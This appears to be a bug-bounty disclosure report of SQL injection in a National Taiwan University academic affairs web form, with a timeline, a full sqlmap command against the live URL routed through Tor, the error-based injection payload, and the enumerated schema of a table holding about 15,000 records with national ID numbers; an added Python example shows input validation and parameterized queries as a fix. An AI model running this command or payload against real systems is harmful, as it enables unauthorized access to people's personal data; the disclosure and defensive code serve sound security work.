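2015-07-26: Details reported to the vendor; awaiting vendor response
2015-07-27: Vendor confirmed; details disclosed to the vendor only
2015-08-06: Details disclosed to core white hats and experts in related fields
2015-08-16: Details disclosed to regular white hats
2015-08-26: Details disclosed to intern white hats
2015-09-10: Details disclosed to the public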
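SQL injection in the Office of Academic Affairs of National Taiwan University (Taiwan) affects over ten thousand users, and the data should include national ID numbers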
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=E --union-char=n -u "http://gra103.aca.ntu.edu.tw/cpt/queryall/default.asp" --data="id_no=A180193569&byear=&bmon=&bday=&cptquery=%ACd%B8%DF" -p id_no -D HWTEST -T cpt --columns
Parameter: id_no (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id_no=A180193569' AND 4827=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4827=4827) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'pGNN'='pGNN&byear=&bmon=&bday=&cptquery=%ACd%B8%DF
Table: cpt
[47 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| account   | varchar  |
| addr      | varchar  |
| agree1    | varchar  |
| agree2    | varchar  |
| area      | varchar  |
| b_area    | varchar  |
| b_country | nvarchar |
| b_date    | varchar  |
| chk_paid  | varchar  |
| chk_price | int      |
| cname     | nvarchar |
| email     | varchar  |
| ename     | nvarchar |
| exam1     | varchar  |
| exam2     | varchar  |
| exam3     | varchar  |
| exam4     | varchar  |
| exam5     | varchar  |
| g_dept    | nvarchar |
| g_other   | nvarchar |
| g_sch     | nvarchar |
| g_type    | nvarchar |
| g_year    | nvarchar |
| id        | varchar  |
| id_no     | varchar  | ====> national ID number
| job       | nvarchar |
| jobtitle  | nvarchar |
| jobtype   | nvarchar |
| nati_doc  | varchar  |
| nati_no   | varchar  |
| now       | varchar  |
| paid      | varchar  |
| price     | int      |
| r_letter  | varchar  |
| sex       | varchar  |
| special0  | varchar  |
| special1  | varchar  |
| special2  | varchar  |
| special3  | varchar  |
| t_addr1   | varchar  |
| t_addr2   | varchar  |
| TEL1      | varchar  |
| TEL2      | varchar  |
| TEL3      | varchar  |
| test_area | varchar  |
| test_yy   | nvarchar |
| vet       | varchar  |
+-----------+----------+

Database: HWTEST
+---------+---------+
| Table   | Entries |
+---------+---------+
| dbo.cpt | 14957   |
+---------+---------+
Filter the input.
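One way to apply the filtering fix named above to the id_no field, shown as an added example that is not part of the original report or the vendor's code: an allow-list validator followed by a bound query parameter. It assumes id_no carries a Taiwan national ID (one letter, nine digits, checksum); the function names, the SQLite stand-in database and all sample values are constructed for illustration.

```python
import re
import sqlite3

# Assumption: id_no holds a Taiwan national ID (one letter + nine ASCII digits).
ID_RE = re.compile(r"[A-Z][0-9]{9}")  # [0-9], not \d, so Unicode digits fail
# Letter -> two-digit code used by the ID checksum (A=10 ... I=34, O=35).
LETTER_CODE = {c: n for n, c in enumerate("ABCDEFGHJKLMNPQRSTUVXYWZIO", start=10)}
WEIGHTS = (1, 9, 8, 7, 6, 5, 4, 3, 2, 1, 1)

def is_valid_id_no(value):
    """Allow-list check: exact format plus checksum; everything else fails."""
    if not isinstance(value, str) or not ID_RE.fullmatch(value):
        return False
    code = LETTER_CODE[value[0]]
    digits = [code // 10, code % 10] + [int(ch) for ch in value[1:]]
    return sum(d * w for d, w in zip(digits, WEIGHTS)) % 10 == 0

def make_db():
    """In-memory SQLite stand-in for the cpt table (constructed sample row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cpt (id_no TEXT, cname TEXT)")
    conn.execute("INSERT INTO cpt VALUES ('A123456789', 'constructed sample')")
    return conn

def lookup(conn, id_no, validate=True):
    """Validate, then bind id_no as a parameter instead of concatenating it."""
    if validate and not is_valid_id_no(id_no):
        raise ValueError("id_no rejected by allow-list validation")
    return conn.execute("SELECT cname FROM cpt WHERE id_no = ?", (id_no,)).fetchall()

def demo():
    """Run constructed inputs through the validated lookup."""
    conn = make_db()
    results = {}
    # Valid ID, bad checksum, and a value that tries to break out of the quotes.
    for candidate in ("A123456789", "A123456788", "A123456789' AND 'a'='a"):
        try:
            results[candidate] = lookup(conn, candidate)
        except ValueError:
            results[candidate] = "rejected"
    return results

if __name__ == "__main__":
    for value, outcome in demo().items():
        print(repr(value), "->", outcome)
```

With validate=False the bound parameter alone still treats the quote-breaking value as plain data and matches no row, so validation acts as a second layer and not as the only control.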
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-07-27 18:23
Thank you for the notification!
None yet